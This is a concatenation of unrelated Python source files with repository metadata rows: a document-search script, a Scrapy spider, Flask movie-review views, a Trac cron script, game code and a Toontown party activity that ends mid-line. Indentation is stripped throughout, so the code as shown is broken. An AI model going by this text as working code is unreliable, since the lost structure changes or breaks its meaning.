:param type: Type of the geomap widget.
:type type: GeomapWidgetDefinitionType
:param view: The view of the world that the map should render.
:type view: GeomapWidgetDefinitionView
"""
if custom_links is not unset:
kwargs["custom_links"] = custom_links
if time is not unset:
kwargs["time"] = time
if title is not unset:
kwargs["title"] = title
if title_align is not unset:
kwargs["title_align"] = title_align
if title_size is not unset:
kwargs["title_size"] = title_size
super().__init__(kwargs)
self_.requests = requests
self_.style = style
self_.type = type
self_.view = view
| [
"noreply@github.com"
] | DataDog.noreply@github.com |
1dae09d80e9732787ff15d193913074f40163b78 | 69daffe62a9769ccacb8a7c27dd313ea58c20a15 | /DocSearch.py | 9caf3a3363a7d91615952faa6cf343ba8f8f9319 | [] | no_license | michaelwoodroof/Document-Search | 55acc6c1f4b0d2365a338f4a1c840985d13d6a26 | 5b5f55a66f58db87aad2d6805039b1555e9c3655 | refs/heads/master | 2022-11-20T17:33:19.170428 | 2020-07-15T12:08:59 | 2020-07-15T12:08:59 | 279,856,771 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,585 | py | import math
import operator
import numpy as np
# Stores all Unique Words as Keys, Values are where word is in Document
# Therefore builds Dictionary and Inverted Index in One
indexSearch = {}
angleStorage = []
queries = []
relevantDocuments = []
def main():
# Initial Assignment
global indexSearch
indexSearch = readFile("docs.txt",0)
queries = readFile("queries.txt",1)
print("Words in dictionary: " + str(len(indexSearch)))
# Query Loop
for query in queries:
print("Query: " + query)
print("Relevant documents: ", end = "")
angleStorage = []
# Finds Relevant Documents
relevantDocuments = querySearch(query,indexSearch)
for document in relevantDocuments:
print(document, end = " ")
print("")
for document in relevantDocuments:
# Add Results to Array
angleStorage.append(str(document) + "," + " %.5f" % calculateAngle(createVectorArray(query,indexSearch,document)))
# Sort in Order
tempVal = []
finalAngles = []
upper = len(angleStorage)
# Uses Selection Sort
while len(finalAngles) != upper:
pos = 0
tempVal = angleStorage[0].split(",")
tempVal = float(tempVal[1])
lowestValue = tempVal
for i in range(len(angleStorage)):
#Find Lowest Value
tempVal = angleStorage[i].split(",")
tempVal = float(tempVal[1])
if tempVal < lowestValue:
lowestValue = tempVal
pos = i
finalAngles.append(angleStorage[pos])
del angleStorage[pos]
# Print Formatted
for angles in finalAngles:
tempVal = angles.split(",")
print(tempVal[0] + " " + tempVal[1])
def chomp(line):
return map(operator.methodcaller('rstrip', '\r\n'), line)
def readFile(filePath,option):
temp = {}
file = open(filePath,'r')
idDoc = 0
if option == 0:
storage = {}
else:
storage = []
# Read Each Line
for line in chomp(file):
start = True
line = line.replace("\t"," ")
idDoc += 1
if option == 0:
line = line.split()
for word in line:
# Create Index
if storage.get(word):
# Existing Word
temp = storage.get(word)
if temp.get(idDoc):
storage[word][idDoc] += 1
else:
#New Word
temp[idDoc] = 1
storage[word] = temp
else:
# New Word
storage[word] = {idDoc: 1}
else:
# Creates Query Array
storage.append(line)
file.close()
return storage
def querySearch(query,index):
foundDocuments = []
keys = []
multipleQuery = query.split(" ")
counter = -1
# Load any and all Documents into Array
for query in multipleQuery:
counter += 1
foundDocuments.append([])
if query in index:
keys = index[query]
for key in keys:
foundDocuments[counter].append(key)
# Perform Intersection if multiple word query
for i in range(1, len(foundDocuments)):
foundDocuments[0] = intersection(foundDocuments[0],foundDocuments[i])
foundDocuments = foundDocuments[0]
return foundDocuments
def intersection(A,B):
intersect = []
for elementA in A:
for elementB in B:
if elementB == elementA and (elementB not in (intersect) or elementA not in (intersect)):
intersect.append(elementB)
break
return intersect
def calculateAngle(arr):
a = arr[0]
b = arr[1]
normA = np.linalg.norm(a)
normB = np.linalg.norm(b)
cosTheta = np.dot (a,b) / (normA * normB)
theta = math.degrees(math.acos(cosTheta))
return theta
def createVectorArray(query,index,docID):
# Split Query
arr = []
queries = query.split(" ")
innerDict = {}
counter = 0
A = np.zeros((len(index),), dtype=int) #A is Query
B = np.zeros((len(index),), dtype=int) #B is Document
for key in index:
innerDict = index[key]
for query in queries:
if key == query:
A[counter] = 1
if innerDict.get(docID):
B[counter] = innerDict[docID]
counter += 1
arr.append(A)
arr.append(B)
return arr
main()
| [
"+michaelwoodroof@users.noreply.github.com"
] | +michaelwoodroof@users.noreply.github.com |
dbb95066a2096e44cf9152e21997cbc1be537e1f | cc2859b4777d57e99fd1e83eaf0e7b6a3fcb6b5e | /test_project/build/lib/test_project/spiders/rooms.py | 018f578c809d4cd7d886cbf04b49e5ebebaaf73c | [] | no_license | Hiroki111/scrapy-test | 748c81f63b189a45c1eaad93daa36d26c5f37827 | f52d628dfe99a4234eb3b13898b6cc710c30f448 | refs/heads/master | 2020-07-30T06:59:09.576177 | 2019-09-22T10:10:31 | 2019-09-22T10:10:31 | 210,126,437 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,643 | py | # -*- coding: utf-8 -*-
from scrapy import Spider
from scrapy import Request
from scrapy.loader import ItemLoader
from test_project.items import PriceSpiderItem
from time import sleep
import random
class RoomsSpider(Spider):
sleep(random.randrange(1, 3))
name = 'rooms'
allowed_domains = [
'flatmates.com.au/rooms/annerley-4103/males+min-150+max-180']
start_urls = [
'http://flatmates.com.au/rooms/annerley-4103/males+min-150+max-180/']
def parse(self, response):
# l = ItemLoader(item=PriceSpiderItem(), response=response)
# for room in response.xpath('.//*[@class="ribbon property"]/text()'):
# price = room.extract()
# l.add_value('price', price)
# yield l.load_item()
# nextUrl = response.xpath(
# '/html/body/div[2]/div[2]/div/nav/div[2]/a/@href').extract_first()
# if nextUrl is not None:
# absoluteNextUrl = response.urljoin(nextUrl)
# yield Spider.scrapy.Request(absoluteNextUrl, callback=self.parse)
rooms = response.xpath(
'.//*[@class="ribbon property"]/text()')
l = ItemLoader(item=PriceSpiderItem(), response=response)
for room in rooms:
price = room.extract()
l.add_value('price', price)
# print(price)
yield l.load_item()
nextUrl = response.xpath(
'/html/body/div[2]/div[2]/div/nav/div[2]/a/@href').extract_first()
absoluteNextUrl = response.urljoin(nextUrl)
print('absoluteNextUrl ' + absoluteNextUrl)
yield Request(url=absoluteNextUrl, callback=self.parse)
| [
"htakahashi@localhost.localdomain"
] | htakahashi@localhost.localdomain |
09b0bfd7ba89b753adde15365a1674b25fb38d71 | 1488955228c48cbaff586e2a8d86249a47645d0d | /app/main/views.py | ec63c98a0f7b5aab3d87e02ab569d663a4452b22 | [] | no_license | vincentouma/watchlist | a286c9d09bb06b18edfa4bc8883e9ec7f302bd01 | 329f90c23e373e14a29f1764cb8958adbbb02279 | refs/heads/master | 2020-06-28T11:00:17.353435 | 2019-08-02T10:19:16 | 2019-08-02T10:19:16 | 198,234,792 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,956 | py | from flask import render_template,request,redirect,url_for,abort
from . import main
from ..requests import get_movies,get_movie,search_movie
from ..models import Review, User
from .forms import ReviewForm,UpdateProfile
from flask_login import login_required,current_user
from .. import db,photos
import markdown2
#views
@main.route('/')
def index():
'''
View root page function that returns the index page and its data
'''
#getting popular movies
popular_movies = get_movies('popular')
upcoming_movie = get_movies('upcoming')
now_showing_movie = get_movies('now_playing')
title = 'Home - Welcome to The Best best Movie Review Website Online'
# message = 'Hello World'
search_movie = request.args.get('movie_query')
if search_movie:
return redirect(url_for('.search',movie_name = search_movie))
else:
return render_template('index.html',title = title, popular = popular_movies,upcoming = upcoming_movie, now_playing = now_showing_movie)
@main.route('/movie/<int:id>')
def movie(id):
'''
View root page function theat returns the index pages and its data
'''
movie = get_movie(id)
title = f'{movie.title}'
reviews = Review.get_reviews(movie.id)
return render_template('movie.html', title = title, movie = movie, reviews = reviews)
@main.route('/search/<movie_name>')
def search(movie_name):
'''
view function to display search results
'''
movie_name_list = movie_name.split(" ")
movie_name_format = "+".join(movie_name_list)
searched_movies = search_movie(movie_name_format)
title = f'search resultd for {movie_name}'
return render_template('search.html', title = title, movies = searched_movies)
@main.route('/movie/review/new/<int:id>', methods = ['GET','POST'])
@login_required
def new_review(id):
form = ReviewForm()
movie = get_movie(id)
if form.validate_on_submit():
title = form.title.data
review = form.review.data
# Updated review instance
new_review = Review(movie_id=movie.id,movie_title=title,image_path=movie.poster,movie_review=review,user=current_user)
# save review method
new_review.save_review()
return redirect(url_for('.movie',id = movie.id ))
title = f'{movie.title} review'
return render_template('new_review.html',title = title, review_form=form, movie=movie)
@main.route('/user/<uname>')
def profile(uname):
user = User.query.filter_by(username = uname).first()
if user is None:
abort(404)
return render_template("profile/profile.html", user = user)
@main.route('/user/<uname>/update',methods = ['GET','POST'])
@login_required
def update_profile(uname):
user = User.query.filter_by(username = uname).first()
if user is None:
abort(404)
form = UpdateProfile()
if form.validate_on_submit():
user.bio = form.bio.data
db.session.add(user)
db.session.commit()
return redirect(url_for('.profile',uname=user.username))
return render_template('profile/update.html',form =form)
@main.route('/user/<uname>/update/pic',methods= ['POST'])
@login_required
def update_pic(uname):
user = User.query.filter_by(username = uname).first()
if 'photo' in request.files:
filename = photos.save(request.files['photo'])
path = f'photos/{filename}'
user.profile_pic_path = path
db.session.commit()
return redirect(url_for('main.profile',uname=uname))
@main.route('/review/<int:id>')
def single_review(id):
review=Review.query.get(id)
if review is None:
abort(404)
format_review = markdown2.markdown(review.movie_review,extras=["code-friendly", "fenced-code-blocks"])
return render_template('review.html',review = review,format_review=format_review)
| [
"vinceoumah@gmail.com"
] | vinceoumah@gmail.com |
c1f9188c2cdd2441cf93c01548fc01884afa940a | a926b7ab55732a847033696d57c24f6d9b4c12b8 | /cron/run-client-event | 4ba52c45c811ce8a90e07df69d95cfdbd88d6806 | [] | no_license | aroth-arsoft/pkg-trac-clients | a24b3a2dff3ebfe498cc5dc9b0e0bdca888bc896 | 1dce48700c4c08b381c7cdbb42ebb6e872747acd | refs/heads/master | 2021-06-07T19:35:31.378278 | 2021-04-17T12:43:46 | 2021-04-17T12:43:46 | 135,186,623 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,434 | #!/usr/bin/env python
# run-client-event
# ----------------------------------------------------------------------------
# Copyright (c) 2008 Colin Guthrie
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to
# deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
# THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
# ----------------------------------------------------------------------------
# This email integration script is meant to interface to the Trac
# (http://www.edgewall.com/products/trac/) issue tracking/wiki/etc
# system
import sys
import locale
from optparse import OptionParser
from trac.env import open_environment
parser = OptionParser()
depr = '(not used anymore)'
parser.add_option('-e', '--env', dest='envpath',
help='Required. Path to the Trac environment.')
parser.add_option('-c', '--event', dest='event',
help='The client event to run (required)')
# parser.add_option('-d', action='store_true', dest='debug',
# help='Turn on debug mode - does not update database '
# 'and prints verbose messages.')
# parser.add_option('-m', '--mail', dest='mail',
# help='Email override. Useful in combination with -d.')
# parser.set_defaults(period='daily', mailtype='summary')
(options, args) = parser.parse_args(sys.argv[1:])
class SendClientFakeReq:
def __init__(self):
class SendClientFakeHref:
def __call__(self, *args, **keywords):
return ''
def wiki(self, *args, **keywords):
return ''
def ticket(self, num):
return '#%d' % (num)
self.href = SendClientFakeHref()
self.abs_href = SendClientFakeHref()
self.perm = []
def __call__(self, *args, **keywords):
return ''
def perm(self, *args, **keywords):
return []
class RunClientEvents:
def __init__(self):
locale.setlocale(locale.LC_ALL, '')
self.env = open_environment(options.envpath)
self.req = SendClientFakeReq()
# Sync the repo so that any commits that happen to have been made
# that include client comments are included.
repos = self.env.get_repository()
repos.sync()
from clients.events import ClientEvent
ClientEvent.triggerall(self.env, self.req, options.event)
if __name__ == '__main__':
if not options.envpath or not options.event:
print "For usage: %s --help" % (sys.argv[0])
else:
RunClientEvents()
| [
"aroth@arsoft-online.com"
] | aroth@arsoft-online.com | |
6c3171994b3a7e1ab9015c0eee96818085aa12b2 | 7ec4cfebfacc504b919a8c2026083d7dc86a829d | /jkEngine/systems_library/map_system.py | dc5615a74eedcb2d5bc0731cdc9f31f2237133e0 | [
"Apache-2.0"
] | permissive | liamcoau/jkEngine | bcf3ad3783ef120052cf3d10bf10e8770ef72651 | 459157d167295abbac570c122e335c16a3b8c68b | refs/heads/master | 2021-06-09T15:14:30.934276 | 2017-06-02T02:20:07 | 2017-06-02T02:20:07 | 19,007,219 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,213 | py | from jkEngine.abstracts import MapSystem
from jkEngine.sfml import Texture, Color, Vector2, RectangleShape
from jkEngine.utils import Vector, Sprite2D
import random, math
class MapSystem (MapSystem):
def __init__ (self):
#Attributes
self.aspectTypes = ["position"]
texture = Texture.from_file("jkEngine/resources/Example Game/background.png")
self.background = Sprite2D(texture)
self.background.setZindex(-1)
self.currentBlocks = 0
self.damageBlockTexture = Texture.from_file("jkEngine/resources/Example Game/damage_block.png")
super().__init__()
def init (self, world):
super().init(world)
self.worldEntity = []
self.world.groupManager.addGroup("damage block")
self.world.groupManager.addGroup("ground geometry")
self.generateGround(Vector(-640, 232))
#self.backgroundEntity = self.world.entityManager.newEntity()
#self.backgroundEntity.addComponent(Vector(0,0), "position")
#self.backgroundEntity.addComponent(0.0, "rotation")
#self.background.offset = Vector(640, 360)
#self.backgroundEntity.addComponent(self.background, "sprite")
self.g = self.world.engine.getGraphicsAccess()
self.pawn = self.world.tagManager.getID("Pawn")
def generateGround (self, position):
self.worldEntity.append(self.world.entityManager.newEntity())
self.world.groupManager.addToGroup(self.worldEntity[-1], "ground geometry")
self.worldEntity[-1].addComponent(position, "position")
self.worldEntity[-1].addComponent(0.0, "rotation")
groundBlockTexture = Texture.from_file("jkEngine/resources/Example Game/ground.png")
groundBlock = Sprite2D(groundBlockTexture)
groundBlock.setZindex(1)
self.worldEntity[-1].addComponent(groundBlock, "sprite")
self.worldEntity[-1].addComponent([{((self.currentBlocks % 3) + 1): [[RectangleShape((1280, 128)), (0, 0)]]}, {}], "collision")
self.currentBlocks += 1
if self.currentBlocks > 1:
p1 = random.randrange(1216)
p2 = random.randrange(1216)
#p3 = random.randrange(1216)
#p4 = random.randrange(1216)
while (math.sqrt((p1 - p2) * (p1 - p2))) < 65:
p2 = random.randrange(1280)
self.generateDamageBlock(Vector((self.currentBlocks * 1280) + p1 - 1280, 232))
self.generateDamageBlock(Vector((self.currentBlocks * 1280) + p2 - 1280, 232))
#self.generateDamageBlock(Vector((self.currentBlocks * 1280) + p3 - 1280, 232))
#self.generateDamageBlock(Vector((self.currentBlocks * 1280) + p4 - 1280, 232))
def generateDamageBlock (self, position):
block = self.world.entityManager.newEntity()
self.world.groupManager.addToGroup(block, "damage block")
block.addComponent(position, "position")
block.addComponent(0.0, "rotation")
damageBlock = Sprite2D(self.damageBlockTexture)
damageBlock.setZindex(2)
block.addComponent(damageBlock, "sprite")
block.addComponent([{-1: [[RectangleShape((64, 64)), (0, 0)]]}, {}], "collision")
def tick (self, deltaTime):
#self.aspect["position"][self.backgroundEntity.id] = self.aspect["position"][self.world.tagManager.getID("PlayerCamera")].copy().add(Vector(-640, -360))
location = self.aspect["position"][self.pawn]
if location[0] > (self.currentBlocks - 1) * 1280:
self.generateGround(Vector((self.currentBlocks * 1280) - 640, 232))
| [
"liamcoau@gmail.com"
] | liamcoau@gmail.com |
da6cc4d0465295d7dfc8e71959ada0bb8de28a93 | 87706e10023b027bf6b4ef9146242a99c0ebbea2 | /docs/conf.py | 1fe4bd3668497bf382483451a6823a64d9af1fb9 | [
"Unlicense"
] | permissive | Kadantte/anime-downloader | 206dc7b9850d6494135ee143c4069df024e500d0 | 24de83d4ef392e17f39710cc9054ff90e3602533 | refs/heads/master | 2022-09-24T02:16:30.770196 | 2022-09-12T11:12:28 | 2022-09-12T11:12:28 | 168,595,085 | 8 | 0 | Unlicense | 2022-09-12T15:01:57 | 2019-01-31T20:54:19 | Python | UTF-8 | Python | false | false | 5,643 | py | # -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath('../anime_downloader'))
# -- Project information -----------------------------------------------------
project = 'anime-downloader'
copyright = '2018, Vishnunarayan K I'
author = 'Vishnunarayan K I'
# The short X.Y version
version = ''
# The full version, including alpha/beta/rc tags
release = '3.5.0'
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.todo',
'sphinx.ext.viewcode',
'sphinx.ext.napoleon',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = None
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
# html_theme = 'alabaster'
html_theme = "sphinx_rtd_theme"
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'anime-downloaderdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'anime-downloader.tex', 'anime-downloader Documentation',
'Vishnunarayan K I', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'anime-downloader', 'anime-downloader Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'anime-downloader', 'anime-downloader Documentation',
author, 'anime-downloader', 'One line description of project.',
'Miscellaneous'),
]
# -- Options for Epub output -------------------------------------------------
# Bibliographic Dublin Core info.
epub_title = project
# The unique identifier of the text. This can be a ISBN number
# or the project homepage.
#
# epub_identifier = ''
# A unique identification for the text.
#
# epub_uid = ''
# A list of files that should not be packed into the epub file.
epub_exclude_files = ['search.html']
# -- Extension configuration -------------------------------------------------
# -- Options for todo extension ----------------------------------------------
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = True
| [
"appukuttancr@gmail.com"
] | appukuttancr@gmail.com |
a060b5bb569c1e8afe3f414bec60273315ca021f | 44796f576b14460f18cbe35e231d1920625c94f1 | /tests/test_history_recorder.py | 02f970da9d176c48d19cc51ce40af1d021c40bb7 | [
"MIT"
] | permissive | kpot/kerl | d8ef913a53207da70ed076efcbfaa08c301bfbd8 | 5f39f547984cd5ded2ff3a9d6092da5055b6009a | refs/heads/master | 2022-07-13T00:02:11.797164 | 2021-03-30T04:11:56 | 2021-03-30T04:11:56 | 134,604,607 | 11 | 4 | MIT | 2022-06-21T21:20:27 | 2018-05-23T17:33:57 | Python | UTF-8 | Python | false | false | 455 | py | import datetime
from kerl.common.history import HistoryRecord
def test_history_record_encoding():
orig_record = HistoryRecord(
date_time=datetime.datetime.now(),
exact_reward=2,
average_reward=10,
num_observations=1000,
diff_seconds=5,
diff_observations=15)
encoded_record = orig_record.encode()
decoded_record = HistoryRecord.decode(encoded_record)
assert decoded_record == orig_record
| [
"kimavr@gmail.com"
] | kimavr@gmail.com |
a31238640d5eae14cbeb79d20eede97d6bcd4516 | ba0cbdae81c171bd4be7b12c0594de72bd6d625a | /MyToontown/Toontown2016/toontown/parties/DistributedPartyCatchActivity.py | e776ef0b7ed00871035165e64ae831b02d97636a | [] | no_license | sweep41/Toontown-2016 | 65985f198fa32a832e762fa9c59e59606d6a40a3 | 7732fb2c27001264e6dd652c057b3dc41f9c8a7d | refs/heads/master | 2021-01-23T16:04:45.264205 | 2017-06-04T02:47:34 | 2017-06-04T02:47:34 | 93,279,679 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 40,123 | py | from pandac.PandaModules import Vec3, Point3, Point4, TextNode, NodePath
from pandac.PandaModules import CollisionHandlerEvent, CollisionNode, CollisionSphere
from direct.distributed.ClockDelta import globalClockDelta
from direct.interval.IntervalGlobal import Sequence, Parallel
from direct.interval.IntervalGlobal import LerpScaleInterval, LerpFunctionInterval, LerpColorScaleInterval, LerpPosInterval
from direct.interval.IntervalGlobal import SoundInterval, WaitInterval
from direct.showbase.PythonUtil import Functor, bound, lerp, SerialNumGen
from direct.showbase.RandomNumGen import RandomNumGen
from direct.task.Task import Task
from direct.distributed import DistributedSmoothNode
from direct.directnotify import DirectNotifyGlobal
from direct.interval.FunctionInterval import Wait, Func
from toontown.toonbase import TTLocalizer
from toontown.toon import Toon
from toontown.toonbase import ToontownGlobals
from toontown.minigame.Trajectory import Trajectory
from toontown.minigame.OrthoDrive import OrthoDrive
from toontown.minigame.OrthoWalk import OrthoWalk
from toontown.minigame.DropPlacer import PartyRegionDropPlacer
from toontown.parties import PartyGlobals
from toontown.parties.PartyCatchActivityToonSD import PartyCatchActivityToonSD
from toontown.parties.DistributedPartyActivity import DistributedPartyActivity
from toontown.parties.DistributedPartyCatchActivityBase import DistributedPartyCatchActivityBase
from toontown.parties.DistributedPartyCannonActivity import DistributedPartyCannonActivity
from toontown.parties.activityFSMs import CatchActivityFSM
class DistributedPartyCatchActivity(DistributedPartyActivity, DistributedPartyCatchActivityBase):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedPartyCatchActivity')
DropTaskName = 'dropSomething'
DropObjectPlurals = {'apple': TTLocalizer.PartyCatchActivityApples,
'orange': TTLocalizer.PartyCatchActivityOranges,
'pear': TTLocalizer.PartyCatchActivityPears,
'coconut': TTLocalizer.PartyCatchActivityCoconuts,
'watermelon': TTLocalizer.PartyCatchActivityWatermelons,
'pineapple': TTLocalizer.PartyCatchActivityPineapples,
'anvil': TTLocalizer.PartyCatchActivityAnvils}
class Generation:
def __init__(self, generation, startTime, startNetworkTime, numPlayers):
self.generation = generation
self.startTime = startTime
self.startNetworkTime = startNetworkTime
self.numPlayers = numPlayers
self.hasBeenScheduled = False
self.droppedObjNames = []
self.dropSchedule = []
self.numItemsDropped = 0
self.droppedObjCaught = {}
def __init__(self, cr):
DistributedPartyActivity.__init__(self, cr, PartyGlobals.ActivityIds.PartyCatch, PartyGlobals.ActivityTypes.HostInitiated, wantRewardGui=True)
self.setUsesSmoothing()
self.setUsesLookAround()
self._sNumGen = SerialNumGen()
def getTitle(self):
return TTLocalizer.PartyCatchActivityTitle
def getInstructions(self):
return TTLocalizer.PartyCatchActivityInstructions % {'badThing': self.DropObjectPlurals['anvil']}
def generate(self):
DistributedPartyActivity.generate(self)
self.notify.info('localAvatar doId: %s' % base.localAvatar.doId)
self.notify.info('generate()')
self._generateFrame = globalClock.getFrameCount()
self._id2gen = {}
self._orderedGenerations = []
self._orderedGenerationIndex = None
rng = RandomNumGen(self.doId)
self._generationSeedBase = rng.randrange(1000)
self._lastDropTime = 0.0
return
def getCurGeneration(self):
if self._orderedGenerationIndex is None:
return
return self._orderedGenerations[self._orderedGenerationIndex]
def _addGeneration(self, generation, startTime, startNetworkTime, numPlayers):
self._id2gen[generation] = self.Generation(generation, startTime, startNetworkTime, numPlayers)
i = 0
while 1:
if i >= len(self._orderedGenerations):
break
gen = self._orderedGenerations[i]
startNetT = self._id2gen[gen].startTime
genId = self._id2gen[gen].generation
if startNetT > startNetworkTime:
break
if startNetT == startNetworkTime and genId > generation:
break
i += 1
self._orderedGenerations = self._orderedGenerations[:i] + [generation] + self._orderedGenerations[i:]
if self._orderedGenerationIndex is not None:
if self._orderedGenerationIndex >= i:
self._orderedGenerationIndex += 1
def _removeGeneration(self, generation):
del self._id2gen[generation]
i = self._orderedGenerations.index(generation)
self._orderedGenerations = self._orderedGenerations[:i] + self._orderedGenerations[i + 1:]
if self._orderedGenerationIndex is not None:
if len(self._orderedGenerations):
if self._orderedGenerationIndex >= i:
self._orderedGenerationIndex -= 1
else:
self._orderedGenerationIndex = None
return
def announceGenerate(self):
self.notify.info('announceGenerate()')
self.catchTreeZoneEvent = 'fence_floor'
DistributedPartyActivity.announceGenerate(self)
def load(self, loadModels = 1, arenaModel = 'partyCatchTree'):
self.notify.info('load()')
DistributedPartyCatchActivity.notify.debug('PartyCatch: load')
self.activityFSM = CatchActivityFSM(self)
if __dev__:
for o in xrange(3):
print {0: 'SPOTS PER PLAYER',
1: 'DROPS PER MINUTE PER SPOT DURING NORMAL DROP PERIOD',
2: 'DROPS PER MINUTE PER PLAYER DURING NORMAL DROP PERIOD'}[o]
for i in xrange(1, self.FallRateCap_Players + 10):
self.defineConstants(forceNumPlayers=i)
numDropLocations = self.DropRows * self.DropColumns
numDropsPerMin = 60.0 / self.DropPeriod
if o == 0:
spotsPerPlayer = numDropLocations / float(i)
print '%2d PLAYERS: %s' % (i, spotsPerPlayer)
elif o == 1:
numDropsPerMinPerSpot = numDropsPerMin / numDropLocations
print '%2d PLAYERS: %s' % (i, numDropsPerMinPerSpot)
elif i > 0:
numDropsPerMinPerPlayer = numDropsPerMin / i
print '%2d PLAYERS: %s' % (i, numDropsPerMinPerPlayer)
self.defineConstants()
self.treesAndFence = loader.loadModel('phase_13/models/parties/%s' % arenaModel)
self.treesAndFence.setScale(0.9)
self.treesAndFence.find('**/fence_floor').setPos(0.0, 0.0, 0.1)
self.treesAndFence.reparentTo(self.root)
ground = self.treesAndFence.find('**/groundPlane')
ground.setBin('ground', 1)
DistributedPartyActivity.load(self)
exitText = TextNode('PartyCatchExitText')
exitText.setCardAsMargin(0.1, 0.1, 0.1, 0.1)
exitText.setCardDecal(True)
exitText.setCardColor(1.0, 1.0, 1.0, 0.0)
exitText.setText(TTLocalizer.PartyCatchActivityExit)
exitText.setTextColor(0.0, 8.0, 0.0, 0.9)
exitText.setAlign(exitText.ACenter)
exitText.setFont(ToontownGlobals.getBuildingNametagFont())
exitText.setShadowColor(0, 0, 0, 1)
exitText.setBin('fixed')
if TTLocalizer.BuildingNametagShadow:
exitText.setShadow(*TTLocalizer.BuildingNametagShadow)
exitTextLoc = self.treesAndFence.find('**/loc_exitSignText')
exitTextNp = exitTextLoc.attachNewNode(exitText)
exitTextNp.setDepthWrite(0)
exitTextNp.setScale(4)
exitTextNp.setZ(-.5)
self.sign.reparentTo(self.treesAndFence.find('**/loc_eventSign'))
self.sign.wrtReparentTo(self.root)
self.avatarNodePath = NodePath('PartyCatchAvatarNodePath')
self.avatarNodePath.reparentTo(self.root)
self._avatarNodePathParentToken = 3
base.cr.parentMgr.registerParent(self._avatarNodePathParentToken, self.avatarNodePath)
self.toonSDs = {}
self.dropShadow = loader.loadModelOnce('phase_3/models/props/drop_shadow')
self.dropObjModels = {}
if loadModels:
self.__loadDropModels()
self.sndGoodCatch = base.loader.loadSfx('phase_4/audio/sfx/SZ_DD_treasure.ogg')
self.sndOof = base.loader.loadSfx('phase_4/audio/sfx/MG_cannon_hit_dirt.ogg')
self.sndAnvilLand = base.loader.loadSfx('phase_4/audio/sfx/AA_drop_anvil_miss.ogg')
self.sndPerfect = base.loader.loadSfx('phase_4/audio/sfx/ring_perfect.ogg')
self.__textGen = TextNode('partyCatchActivity')
self.__textGen.setFont(ToontownGlobals.getSignFont())
self.__textGen.setAlign(TextNode.ACenter)
self.activityFSM.request('Idle')
def __loadDropModels(self):
for objType in PartyGlobals.DropObjectTypes:
model = loader.loadModel(objType.modelPath)
self.dropObjModels[objType.name] = model
modelScales = {'apple': 0.7,
